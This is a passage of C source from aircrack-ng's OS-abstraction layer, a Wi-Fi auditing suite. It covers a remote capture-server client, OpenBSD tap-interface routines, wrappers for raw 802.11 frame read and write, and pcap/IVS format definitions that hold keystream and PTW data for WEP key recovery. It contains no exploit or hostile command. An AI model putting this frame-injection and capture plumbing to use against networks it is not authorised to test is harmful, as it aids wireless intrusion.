{ 386 | struct priv_net *pn = wi_priv(wi); 387 | 388 | return net_cmd(pn, NET_GET_RATE, NULL, 0); 389 | } 390 | 391 | static int net_get_monitor(struct wif *wi) 392 | { 393 | return net_cmd(wi_priv(wi), NET_GET_MONITOR, NULL, 0); 394 | } 395 | 396 | static void do_net_free(struct wif *wi) 397 | { 398 | assert(wi->wi_priv); 399 | free(wi->wi_priv); 400 | wi->wi_priv = 0; 401 | free(wi); 402 | } 403 | 404 | static void net_close(struct wif *wi) 405 | { 406 | struct priv_net *pn = wi_priv(wi); 407 | 408 | close(pn->pn_s); 409 | do_net_free(wi); 410 | } 411 | 412 | static int get_ip_port(char *iface, char *ip, const int ipsize) 413 | { 414 | char *host; 415 | char *ptr; 416 | int port = -1; 417 | struct in_addr addr; 418 | 419 | host = strdup(iface); 420 | if (!host) 421 | return -1; 422 | 423 | ptr = strchr(host, ':'); 424 | if (!ptr) 425 | goto out; 426 | 427 | *ptr++ = 0; 428 | 429 | if (!inet_aton(host, &addr)) 430 | goto out; /* XXX resolve hostname */ 431 | 432 | assert(strlen(host) <= 15); 433 | strncpy(ip, host, ipsize); 434 | port = atoi(ptr); 435 | 436 | out: 437 | free(host); 438 | return port; 439 | } 440 | 441 | static int handshake(int s) 442 | { 443 | if (s) {} /* XXX unused */ 444 | /* XXX do a handshake */ 445 | return 0; 446 | } 447 | 448 | static int do_net_open(char *iface) 449 | { 450 | int s, port; 451 | char ip[16]; 452 | struct sockaddr_in s_in; 453 | 454 | port = get_ip_port(iface, ip, sizeof(ip)-1); 455 | if (port == -1) 456 | return -1; 457 | 458 | s_in.sin_family = PF_INET; 459 | s_in.sin_port = htons(port); 460 | if (!inet_aton(ip, &s_in.sin_addr)) 461 | return -1; 462 | 463 | if ((s = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) 464 | return -1; 465 | 466 | printf("Connecting to %s port %d...\n", ip, port); 467 | 468 | if (connect(s, (struct sockaddr*) &s_in, sizeof(s_in)) == -1) { 469 | close(s); 470 | 471 | printf("Failed to connect\n"); 472 | 473 | return -1; 474 | } 475 | 476 | if (handshake(s) == -1) { 477 | close(s); 478 | 479 | printf("Failed to connect - handshake failed\n"); 480 | 481 | return -1; 482 | } 483 | 484 | printf("Connection successful\n"); 485 | 486 | return s; 487 | } 488 | 489 | static int net_fd(struct wif *wi) 490 | { 491 | struct priv_net *pn = wi_priv(wi); 492 | 493 | return pn->pn_s; 494 | } 495 | 496 | struct wif *net_open(char *iface) 497 | { 498 | struct wif *wi; 499 | struct priv_net *pn; 500 | int s; 501 | 502 | /* setup wi struct */ 503 | wi = wi_alloc(sizeof(*pn)); 504 | if (!wi) 505 | return NULL; 506 | wi->wi_read = net_read; 507 | wi->wi_write = net_write; 508 | wi->wi_set_channel = net_set_channel; 509 | wi->wi_get_channel = net_get_channel; 510 | wi->wi_set_rate = net_set_rate; 511 | wi->wi_get_rate = net_get_rate; 512 | wi->wi_close = net_close; 513 | wi->wi_fd = net_fd; 514 | wi->wi_get_mac = net_get_mac; 515 | wi->wi_get_monitor = net_get_monitor; 516 | 517 | /* setup iface */ 518 | s = do_net_open(iface); 519 | if (s == -1) { 520 | do_net_free(wi); 521 | return NULL; 522 | } 523 | 524 | /* setup private state */ 525 | pn = wi_priv(wi); 526 | pn->pn_s = s; 527 | pn->pn_queue.q_next = pn->pn_queue.q_prev = &pn->pn_queue; 528 | pn->pn_queue_free.q_next = pn->pn_queue_free.q_prev 529 | = &pn->pn_queue_free; 530 | 531 | return wi; 532 | } 533 | -------------------------------------------------------------------------------- /osdep/network.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * Networking structures. 5 | * 6 | */ 7 | 8 | #ifndef __AIRCRACK_NG_OSDEP_NETWORK_H__ 9 | #define __AIRCRACK_NG_OSDEP_NETWORK_H__ 10 | 11 | #include 12 | #include 13 | 14 | #include "osdep.h" 15 | 16 | enum { 17 | NET_RC = 1, 18 | NET_GET_CHAN, 19 | NET_SET_CHAN, 20 | NET_WRITE, 21 | NET_PACKET, /* 5 */ 22 | NET_GET_MAC, 23 | NET_MAC, 24 | NET_GET_MONITOR, 25 | NET_GET_RATE, 26 | NET_SET_RATE, 27 | }; 28 | 29 | struct net_hdr { 30 | uint8_t nh_type; 31 | uint32_t nh_len; 32 | uint8_t nh_data[0]; 33 | } __packed; 34 | 35 | extern struct wif *net_open(char *iface); 36 | extern int net_send(int s, int command, void *arg, int len); 37 | extern int net_read_exact(int s, void *arg, int len); 38 | extern int net_get(int s, void *arg, int *len); 39 | 40 | 41 | 42 | 43 | #endif /* __AIRCRACK_NG_OSEDEP_NETWORK_H__ */ 44 | -------------------------------------------------------------------------------- /osdep/openbsd_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for OpenBSD. TAP routines 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | #include "osdep.h" 34 | 35 | struct tip_obsd { 36 | int to_fd; 37 | int to_ioctls; 38 | struct ifreq to_ifr; 39 | char to_name[MAX_IFACE_NAME]; 40 | int to_destroy; 41 | }; 42 | 43 | static int ti_do_open_obsd(struct tif *ti, char *name) 44 | { 45 | int fd; 46 | char *iface = "/dev/tap"; 47 | struct stat st; 48 | struct tip_obsd *priv = ti_priv(ti); 49 | int s; 50 | unsigned int flags; 51 | struct ifreq *ifr; 52 | 53 | /* open tap */ 54 | if (name) 55 | iface = name; 56 | else 57 | priv->to_destroy = 1; /* we create, we destroy */ 58 | 59 | fd = open(iface, O_RDWR); 60 | if (fd == -1) 61 | return -1; 62 | 63 | /* get name */ 64 | if(fstat(fd, &st) == -1) 65 | goto err; 66 | snprintf(priv->to_name, sizeof(priv->to_name)-1, "%s", 67 | devname(st.st_rdev, S_IFCHR)); 68 | 69 | /* bring iface up */ 70 | s = socket(PF_INET, SOCK_DGRAM, 0); 71 | if (s == -1) 72 | goto err; 73 | priv->to_ioctls = s; 74 | 75 | /* get flags */ 76 | ifr = &priv->to_ifr; 77 | memset(ifr, 0, sizeof(*ifr)); 78 | snprintf(ifr->ifr_name, sizeof(ifr->ifr_name)-1, "%s", priv->to_name); 79 | if (ioctl(s, SIOCGIFFLAGS, ifr) == -1) 80 | goto err2; 81 | flags = ifr->ifr_flags; 82 | 83 | /* set flags */ 84 | flags |= IFF_UP; 85 | ifr->ifr_flags = flags & 0xffff; 86 | if (ioctl(s, SIOCSIFFLAGS, ifr) == -1) 87 | goto err2; 88 | 89 | return fd; 90 | err: 91 | /* XXX destroy */ 92 | close(fd); 93 | return -1; 94 | err2: 95 | close(s); 96 | goto err; 97 | } 98 | 99 | static void ti_do_free(struct tif *ti) 100 | { 101 | struct tip_obsd *priv = ti_priv(ti); 102 | 103 | free(priv); 104 | free(ti); 105 | } 106 | 107 | static void ti_destroy(struct tip_obsd *priv) 108 | { 109 | ioctl(priv->to_ioctls, SIOCIFDESTROY, &priv->to_ifr); 110 | } 111 | 112 | static void ti_close_obsd(struct tif *ti) 113 | { 114 | struct tip_obsd *priv = ti_priv(ti); 115 | 116 | if (priv->to_destroy) 117 | ti_destroy(priv); 118 | 119 | close(priv->to_fd); 120 | close(priv->to_ioctls); 121 | ti_do_free(ti); 122 | } 123 | 124 | static char *ti_name_obsd(struct tif *ti) 125 | { 126 | struct tip_obsd *priv = ti_priv(ti); 127 | 128 | return priv->to_name; 129 | } 130 | 131 | static int ti_set_mtu_obsd(struct tif *ti, int mtu) 132 | { 133 | struct tip_obsd *priv = ti_priv(ti); 134 | 135 | priv->to_ifr.ifr_mtu = mtu; 136 | 137 | return ioctl(priv->to_ioctls, SIOCSIFMTU, &priv->to_ifr); 138 | } 139 | 140 | static int ti_set_mac_obsd(struct tif *ti, unsigned char *mac) 141 | { 142 | struct tip_obsd *priv = ti_priv(ti); 143 | struct ifreq *ifr = &priv->to_ifr; 144 | 145 | ifr->ifr_addr.sa_family = AF_LINK; 146 | ifr->ifr_addr.sa_len = 6; 147 | memcpy(ifr->ifr_addr.sa_data, mac, 6); 148 | 149 | return ioctl(priv->to_ioctls, SIOCSIFLLADDR, ifr); 150 | } 151 | 152 | static int ti_set_ip_obsd(struct tif *ti, struct in_addr *ip) 153 | { 154 | struct tip_obsd *priv = ti_priv(ti); 155 | struct ifaliasreq ifra; 156 | struct sockaddr_in *s_in; 157 | 158 | /* assume same size */ 159 | memset(&ifra, 0, sizeof(ifra)); 160 | strncpy(ifra.ifra_name, priv->to_ifr.ifr_name, IFNAMSIZ); 161 | 162 | s_in = (struct sockaddr_in *) &ifra.ifra_addr; 163 | s_in->sin_family = PF_INET; 164 | s_in->sin_addr = *ip; 165 | s_in->sin_len = sizeof(*s_in); 166 | 167 | return ioctl(priv->to_ioctls, SIOCAIFADDR, &ifra); 168 | } 169 | 170 | static int ti_fd_obsd(struct tif *ti) 171 | { 172 | struct tip_obsd *priv = ti_priv(ti); 173 | 174 | return priv->to_fd; 175 | } 176 | 177 | static int ti_read_obsd(struct tif *ti, void *buf, int len) 178 | { 179 | return read(ti_fd(ti), buf, len); 180 | } 181 | 182 | static int ti_write_obsd(struct tif *ti, void *buf, int len) 183 | { 184 | return write(ti_fd(ti), buf, len); 185 | } 186 | 187 | static struct tif *ti_open_obsd(char *iface) 188 | { 189 | struct tif *ti; 190 | struct tip_obsd *priv; 191 | int fd; 192 | 193 | /* setup ti struct */ 194 | ti = ti_alloc(sizeof(*priv)); 195 | if (!ti) 196 | return NULL; 197 | ti->ti_name = ti_name_obsd; 198 | ti->ti_set_mtu = ti_set_mtu_obsd; 199 | ti->ti_close = ti_close_obsd; 200 | ti->ti_fd = ti_fd_obsd; 201 | ti->ti_read = ti_read_obsd; 202 | ti->ti_write = ti_write_obsd; 203 | ti->ti_set_mac = ti_set_mac_obsd; 204 | ti->ti_set_ip = ti_set_ip_obsd; 205 | 206 | /* setup iface */ 207 | fd = ti_do_open_obsd(ti, iface); 208 | if (fd == -1) { 209 | ti_do_free(ti); 210 | return NULL; 211 | } 212 | 213 | /* setup private state */ 214 | priv = ti_priv(ti); 215 | priv->to_fd = fd; 216 | 217 | return ti; 218 | } 219 | 220 | struct tif *ti_open(char *iface) 221 | { 222 | return ti_open_obsd(iface); 223 | } 224 | -------------------------------------------------------------------------------- /osdep/osdep.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API. 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | #include "osdep.h" 26 | #include "network.h" 27 | 28 | extern struct wif *file_open(char *iface); 29 | 30 | int wi_read(struct wif *wi, unsigned char *h80211, int len, struct rx_info *ri) 31 | { 32 | assert(wi->wi_read); 33 | return wi->wi_read(wi, h80211, len, ri); 34 | } 35 | 36 | int wi_write(struct wif *wi, unsigned char *h80211, int len, 37 | struct tx_info *ti) 38 | { 39 | assert(wi->wi_write); 40 | return wi->wi_write(wi, h80211, len, ti); 41 | } 42 | 43 | int wi_set_channel(struct wif *wi, int chan) 44 | { 45 | assert(wi->wi_set_channel); 46 | return wi->wi_set_channel(wi, chan); 47 | } 48 | 49 | int wi_get_channel(struct wif *wi) 50 | { 51 | assert(wi->wi_get_channel); 52 | return wi->wi_get_channel(wi); 53 | } 54 | 55 | int wi_set_freq(struct wif *wi, int freq) 56 | { 57 | assert(wi->wi_set_freq); 58 | return wi->wi_set_freq(wi, freq); 59 | } 60 | 61 | int wi_get_freq(struct wif *wi) 62 | { 63 | assert(wi->wi_get_freq); 64 | return wi->wi_get_freq(wi); 65 | } 66 | 67 | int wi_get_monitor(struct wif *wi) 68 | { 69 | assert(wi->wi_get_monitor); 70 | return wi->wi_get_monitor(wi); 71 | } 72 | 73 | char *wi_get_ifname(struct wif *wi) 74 | { 75 | return wi->wi_interface; 76 | } 77 | 78 | void wi_close(struct wif *wi) 79 | { 80 | assert(wi->wi_close); 81 | wi->wi_close(wi); 82 | } 83 | 84 | int wi_fd(struct wif *wi) 85 | { 86 | assert(wi->wi_fd); 87 | return wi->wi_fd(wi); 88 | } 89 | 90 | struct wif *wi_alloc(int sz) 91 | { 92 | struct wif *wi; 93 | void *priv; 94 | 95 | /* Allocate wif & private state */ 96 | wi = malloc(sizeof(*wi)); 97 | if (!wi) 98 | return NULL; 99 | memset(wi, 0, sizeof(*wi)); 100 | 101 | priv = malloc(sz); 102 | if (!priv) { 103 | free(wi); 104 | return NULL; 105 | } 106 | memset(priv, 0, sz); 107 | wi->wi_priv = priv; 108 | 109 | return wi; 110 | } 111 | 112 | void *wi_priv(struct wif *wi) 113 | { 114 | return wi->wi_priv; 115 | } 116 | 117 | int wi_get_mac(struct wif *wi, unsigned char *mac) 118 | { 119 | assert(wi->wi_get_mac); 120 | return wi->wi_get_mac(wi, mac); 121 | } 122 | 123 | int wi_set_mac(struct wif *wi, unsigned char *mac) 124 | { 125 | assert(wi->wi_set_mac); 126 | return wi->wi_set_mac(wi, mac); 127 | } 128 | 129 | int wi_get_rate(struct wif *wi) 130 | { 131 | assert(wi->wi_get_rate); 132 | return wi->wi_get_rate(wi); 133 | } 134 | 135 | int wi_set_rate(struct wif *wi, int rate) 136 | { 137 | assert(wi->wi_set_rate); 138 | return wi->wi_set_rate(wi, rate); 139 | } 140 | 141 | int wi_get_mtu(struct wif *wi) 142 | { 143 | assert(wi->wi_get_mtu); 144 | return wi->wi_get_mtu(wi); 145 | } 146 | 147 | int wi_set_mtu(struct wif *wi, int mtu) 148 | { 149 | assert(wi->wi_set_mtu); 150 | return wi->wi_set_mtu(wi, mtu); 151 | } 152 | 153 | struct wif *wi_open(char *iface) 154 | { 155 | struct wif *wi; 156 | 157 | wi = file_open(iface); 158 | if (wi == (struct wif*) -1) 159 | return NULL; 160 | if (!wi) 161 | wi = net_open(iface); 162 | if (!wi) 163 | wi = wi_open_osdep(iface); 164 | if (!wi) 165 | return NULL; 166 | 167 | strncpy(wi->wi_interface, iface, sizeof(wi->wi_interface)-1); 168 | wi->wi_interface[sizeof(wi->wi_interface)-1] = 0; 169 | 170 | return wi; 171 | } 172 | 173 | /* tap stuff */ 174 | char *ti_name(struct tif *ti) 175 | { 176 | assert(ti->ti_name); 177 | return ti->ti_name(ti); 178 | } 179 | 180 | int ti_set_mtu(struct tif *ti, int mtu) 181 | { 182 | assert(ti->ti_set_mtu); 183 | return ti->ti_set_mtu(ti, mtu); 184 | } 185 | 186 | int ti_get_mtu(struct tif *ti) 187 | { 188 | assert(ti->ti_get_mtu); 189 | return ti->ti_get_mtu(ti); 190 | } 191 | 192 | void ti_close(struct tif *ti) 193 | { 194 | assert(ti->ti_close); 195 | ti->ti_close(ti); 196 | } 197 | 198 | int ti_fd(struct tif *ti) 199 | { 200 | assert(ti->ti_fd); 201 | return ti->ti_fd(ti); 202 | } 203 | 204 | int ti_read(struct tif *ti, void *buf, int len) 205 | { 206 | assert(ti->ti_read); 207 | return ti->ti_read(ti, buf, len); 208 | } 209 | 210 | int ti_write(struct tif *ti, void *buf, int len) 211 | { 212 | assert(ti->ti_write); 213 | return ti->ti_write(ti, buf, len); 214 | } 215 | 216 | int ti_set_mac(struct tif *ti, unsigned char *mac) 217 | { 218 | assert(ti->ti_set_mac); 219 | return ti->ti_set_mac(ti, mac); 220 | } 221 | 222 | int ti_set_ip(struct tif *ti, struct in_addr *ip) 223 | { 224 | assert(ti->ti_set_ip); 225 | return ti->ti_set_ip(ti, ip); 226 | } 227 | 228 | struct tif *ti_alloc(int sz) 229 | { 230 | struct tif *ti; 231 | void *priv; 232 | 233 | /* Allocate tif & private state */ 234 | ti = malloc(sizeof(*ti)); 235 | if (!ti) 236 | return NULL; 237 | memset(ti, 0, sizeof(*ti)); 238 | 239 | priv = malloc(sz); 240 | if (!priv) { 241 | free(ti); 242 | return NULL; 243 | } 244 | memset(priv, 0, sz); 245 | ti->ti_priv = priv; 246 | 247 | return ti; 248 | } 249 | 250 | void *ti_priv(struct tif *ti) 251 | { 252 | return ti->ti_priv; 253 | } 254 | -------------------------------------------------------------------------------- /osdep/osdep.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * All OS dependent crap should go here. 4 | * 5 | * This program is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as 7 | * published by the Free Software Foundation; either version 2 of the 8 | * License, or (at your option) any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, but 11 | * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied 12 | * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and 13 | * NON-INFRINGEMENT. See the GNU General Public License for more details. 14 | * 15 | * You should have received a copy of the GNU General Public License 16 | * along with this program; if not, write to the Free Software 17 | * Foundation, Inc., 59 Temple Place - Suite 330, Boston, 18 | * MA 02111-1307, USA. 19 | * 20 | * In addition, as a special exception, the copyright holders give 21 | * permission to link the code of portions of this program with the 22 | * OpenSSL library under certain conditions as described in each 23 | * individual source file, and distribute linked combinations 24 | * including the two. 25 | * You must obey the GNU General Public License in all respects 26 | * for all of the code used other than OpenSSL. If you modify 27 | * file(s) with this exception, you may extend this exception to your 28 | * version of the file(s), but you are not obligated to do so. If you 29 | * do not wish to do so, delete this exception statement from your 30 | * version. If you delete this exception statement from all source 31 | * files in the program, then also delete it here. 32 | */ 33 | 34 | #ifndef __AIRCRACK_NG_OSEDEP_H__ 35 | #define __AIRCRACK_NG_OSEDEP_H__ 36 | 37 | #include 38 | #include 39 | 40 | #include "byteorder.h" 41 | #include "packed.h" 42 | 43 | #if defined(__APPLE_CC__) && defined(_XCODE) 44 | #include 45 | #undef LINKTYPE_RADIOTAP_HDR 46 | #define LINKTYPE_RADIOTAP_HDR DLT_IEEE802_11_RADIO 47 | #undef LINKTYPE_IEEE802_11 48 | #define LINKTYPE_IEEE802_11 DLT_IEEE802_11 49 | #undef LINKTYPE_PRISM_HEADER 50 | #define LINKTYPE_PRISM_HEADER DLT_PRISM_HEADER 51 | #undef LINKTYPE_ETHERNET 52 | #define LINKTYPE_ETHERNET DLT_ERF_ETH 53 | #undef LINKTYPE_PPI_HDR 54 | #define LINKTYPE_PPI_HDR DLT_PPI 55 | #undef TCPDUMP_MAGIC 56 | #define TCPDUMP_MAGIC 0xa1b2c3d4 57 | #endif 58 | 59 | /* For all structures, when adding new fields, always append them to the end. 60 | * This way legacy binary code does not need to be recompiled. This is 61 | * particularly useful for DLLs. -sorbo 62 | */ 63 | 64 | struct tx_info { 65 | unsigned int ti_rate; 66 | }; 67 | 68 | struct rx_info { 69 | uint64_t ri_mactime; 70 | int32_t ri_power; 71 | int32_t ri_noise; 72 | uint32_t ri_channel; 73 | uint32_t ri_freq; 74 | uint32_t ri_rate; 75 | uint32_t ri_antenna; 76 | } __packed; 77 | 78 | /* Normal code should not access this directly. Only osdep. 79 | * This structure represents a single interface. It should be created with 80 | * wi_open and destroyed with wi_close. 81 | */ 82 | #define MAX_IFACE_NAME 64 83 | struct wif { 84 | int (*wi_read)(struct wif *wi, unsigned char *h80211, int len, 85 | struct rx_info *ri); 86 | int (*wi_write)(struct wif *wi, unsigned char *h80211, int len, 87 | struct tx_info *ti); 88 | int (*wi_set_channel)(struct wif *wi, int chan); 89 | int (*wi_get_channel)(struct wif *wi); 90 | int (*wi_set_freq)(struct wif *wi, int freq); 91 | int (*wi_get_freq)(struct wif *wi); 92 | void (*wi_close)(struct wif *wi); 93 | int (*wi_fd)(struct wif *wi); 94 | int (*wi_get_mac)(struct wif *wi, unsigned char *mac); 95 | int (*wi_set_mac)(struct wif *wi, unsigned char *mac); 96 | int (*wi_set_rate)(struct wif *wi, int rate); 97 | int (*wi_get_rate)(struct wif *wi); 98 | int (*wi_set_mtu)(struct wif *wi, int mtu); 99 | int (*wi_get_mtu)(struct wif *wi); 100 | int (*wi_get_monitor)(struct wif *wi); 101 | 102 | void *wi_priv; 103 | char wi_interface[MAX_IFACE_NAME]; 104 | }; 105 | 106 | /* Routines to be used by client code */ 107 | extern struct wif *wi_open(char *iface); 108 | extern int wi_read(struct wif *wi, unsigned char *h80211, int len, 109 | struct rx_info *ri); 110 | extern int wi_write(struct wif *wi, unsigned char *h80211, int len, 111 | struct tx_info *ti); 112 | extern int wi_set_channel(struct wif *wi, int chan); 113 | extern int wi_get_channel(struct wif *wi); 114 | extern int wi_set_freq(struct wif *wi, int freq); 115 | extern int wi_get_freq(struct wif *wi); 116 | extern void wi_close(struct wif *wi); 117 | extern char *wi_get_ifname(struct wif *wi); 118 | extern int wi_get_mac(struct wif *wi, unsigned char *mac); 119 | extern int wi_set_mac(struct wif *wi, unsigned char *mac); 120 | extern int wi_get_rate(struct wif *wi); 121 | extern int wi_set_rate(struct wif *wi, int rate); 122 | extern int wi_get_monitor(struct wif *wi); 123 | extern int wi_get_mtu(struct wif *wi); 124 | extern int wi_set_mtu(struct wif *wi, int mtu); 125 | 126 | /* wi_open_osdep should determine the type of card and setup the wif structure 127 | * appropriately. There is one per OS. Called by wi_open. 128 | */ 129 | extern struct wif *wi_open_osdep(char *iface); 130 | 131 | /* This will return the FD used for reading. This is required for using select 132 | * on it. 133 | */ 134 | extern int wi_fd(struct wif *wi); 135 | 136 | /* Helper routines for osdep code. */ 137 | extern struct wif *wi_alloc(int sz); 138 | extern void *wi_priv(struct wif *wi); 139 | 140 | /* Client code can use this to determine the battery state. One per OS. */ 141 | extern int get_battery_state(void); 142 | 143 | /* Client code can create a tap interface */ 144 | /* XXX we can unify the tap & wi stuff in the future, but for now, lets keep 145 | * them separate until we learn something. 146 | */ 147 | struct tif { 148 | int (*ti_read)(struct tif *ti, void *buf, int len); 149 | int (*ti_write)(struct tif *ti, void *buf, int len); 150 | int (*ti_fd)(struct tif *ti); 151 | char *(*ti_name)(struct tif *ti); 152 | int (*ti_set_mtu)(struct tif *ti, int mtu); 153 | int (*ti_get_mtu)(struct tif *ti); 154 | int (*ti_set_ip)(struct tif *ti, struct in_addr *ip); 155 | int (*ti_set_mac)(struct tif *ti, unsigned char *mac); 156 | void (*ti_close)(struct tif *ti); 157 | 158 | void *ti_priv; 159 | }; 160 | /* one per OS */ 161 | extern struct tif *ti_open(char *iface); 162 | 163 | /* osdep routines */ 164 | extern struct tif *ti_alloc(int sz); 165 | extern void *ti_priv(struct tif *ti); 166 | 167 | /* client routines */ 168 | extern char *ti_name(struct tif *ti); 169 | extern int ti_set_mtu(struct tif *ti, int mtu); 170 | extern int ti_get_mtu(struct tif *ti); 171 | extern void ti_close(struct tif *ti); 172 | extern int ti_fd(struct tif *ti); 173 | extern int ti_read(struct tif *ti, void *buf, int len); 174 | extern int ti_write(struct tif *ti, void *buf, int len); 175 | extern int ti_set_mac(struct tif *ti, unsigned char *mac); 176 | extern int ti_set_ip(struct tif *ti, struct in_addr *ip); 177 | 178 | #endif /* __AIRCRACK_NG_OSEDEP_H__ */ 179 | -------------------------------------------------------------------------------- /osdep/packed.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Pack structures 3 | * 4 | * Copyright (c) 2007, 2008, Andrea Bittau 5 | * 6 | * This program is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as 8 | * published by the Free Software Foundation; either version 2 of the 9 | * License, or (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, but 12 | * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied 13 | * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and 14 | * NON-INFRINGEMENT. See the GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place - Suite 330, Boston, 19 | * MA 02111-1307, USA. 20 | * 21 | * In addition, as a special exception, the copyright holders give 22 | * permission to link the code of portions of this program with the 23 | * OpenSSL library under certain conditions as described in each 24 | * individual source file, and distribute linked combinations 25 | * including the two. 26 | * You must obey the GNU General Public License in all respects 27 | * for all of the code used other than OpenSSL. If you modify 28 | * file(s) with this exception, you may extend this exception to your 29 | * version of the file(s), but you are not obligated to do so. If you 30 | * do not wish to do so, delete this exception statement from your 31 | * version. If you delete this exception statement from all source 32 | * files in the program, then also delete it here. 33 | */ 34 | 35 | #ifndef __AIRCRACK_NG_OSDEP_PACKED_H__ 36 | #define __AIRCRACK_NG_OSDEP_PACKED_H__ 37 | 38 | #ifndef __packed 39 | #define __packed __attribute__ ((__packed__)) 40 | #endif /* __packed */ 41 | 42 | #ifndef __aligned 43 | #define __aligned(n) 44 | #endif 45 | 46 | #endif /* __AIRCRACK_NG_OSEDEP_PACKED_H__ */ 47 | -------------------------------------------------------------------------------- /osdep/pcap.h: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright (C) 2001-2004 Christophe Devine 4 | * 5 | * This program is free software; you can redistribute it and/or modify 6 | * it under the terms of the GNU General Public License as published by 7 | * the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program is distributed in the hope that it will be useful, 11 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | * 15 | * You should have received a copy of the GNU General Public License 16 | * along with this program; if not, write to the Free Software 17 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | * 19 | * In addition, as a special exception, the copyright holders give 20 | * permission to link the code of portions of this program with the 21 | * OpenSSL library under certain conditions as described in each 22 | * individual source file, and distribute linked combinations 23 | * including the two. 24 | * You must obey the GNU General Public License in all respects 25 | * for all of the code used other than OpenSSL. If you modify 26 | * file(s) with this exception, you may extend this exception to your 27 | * version of the file(s), but you are not obligated to do so. If you 28 | * do not wish to do so, delete this exception statement from your 29 | * version. If you delete this exception statement from all source 30 | * files in the program, then also delete it here. 31 | 32 | */ 33 | #ifndef _AIRCRACK_NG_PCAP_H_ 34 | #define _AIRCRACK_NG_PCAP_H_ 35 | 36 | #include 37 | 38 | #define FORMAT_CAP 1 39 | #define FORMAT_IVS 2 40 | #define FORMAT_IVS2 3 41 | 42 | #define TCPDUMP_MAGIC 0xA1B2C3D4 43 | #define TCPDUMP_CIGAM 0xD4C3B2A1 44 | #define IVSONLY_MAGIC "\xBF\xCA\x84\xD4" 45 | #define IVS2_MAGIC "\xAE\x78\xD1\xFF" 46 | #define IVS2_EXTENSION "ivs" 47 | #define IVS2_VERSION 1 48 | 49 | #define PCAP_VERSION_MAJOR 2 50 | #define PCAP_VERSION_MINOR 4 51 | 52 | #define LINKTYPE_ETHERNET 1 53 | #define LINKTYPE_IEEE802_11 105 54 | #define LINKTYPE_PRISM_HEADER 119 55 | #define LINKTYPE_RADIOTAP_HDR 127 56 | #define LINKTYPE_PPI_HDR 192 57 | 58 | //BSSID const. length of 6 bytes; can be together with all the other types 59 | #define IVS2_BSSID 0x0001 60 | 61 | //ESSID var. length; alone, or with BSSID 62 | #define IVS2_ESSID 0x0002 63 | 64 | //wpa structure, const. length; alone, or with BSSID 65 | #define IVS2_WPA 0x0004 66 | 67 | //IV+IDX+KEYSTREAM, var. length; alone or with BSSID 68 | #define IVS2_XOR 0x0008 69 | 70 | /* [IV+IDX][i][l][XOR_1]..[XOR_i][weight] * 71 | * holds i possible keystreams for the same IV with a length of l for each keystream (l max 32) * 72 | * and an array "int weight[16]" at the end */ 73 | #define IVS2_PTW 0x0010 74 | 75 | //unencrypted packet 76 | #define IVS2_CLR 0x0020 77 | 78 | // Maximum length of an Information Element 79 | #define MAX_IE_ELEMENT_SIZE 256 80 | 81 | struct pcap_file_header 82 | { 83 | uint32_t magic; 84 | uint16_t version_major; 85 | uint16_t version_minor; 86 | int32_t thiszone; 87 | uint32_t sigfigs; 88 | uint32_t snaplen; 89 | uint32_t linktype; 90 | }; 91 | 92 | struct pcap_pkthdr 93 | { 94 | int32_t tv_sec; 95 | int32_t tv_usec; 96 | uint32_t caplen; 97 | uint32_t len; 98 | }; 99 | 100 | struct ivs2_filehdr 101 | { 102 | uint16_t version; 103 | }; 104 | 105 | struct ivs2_pkthdr 106 | { 107 | uint16_t flags; 108 | uint16_t len; 109 | }; 110 | 111 | #endif /* common.h */ 112 | -------------------------------------------------------------------------------- /osdep/radiotap/COPYING: -------------------------------------------------------------------------------- 1 | Copyright (c) 2007-2009 Andy Green 2 | Copyright (c) 2007-2009 Johannes Berg 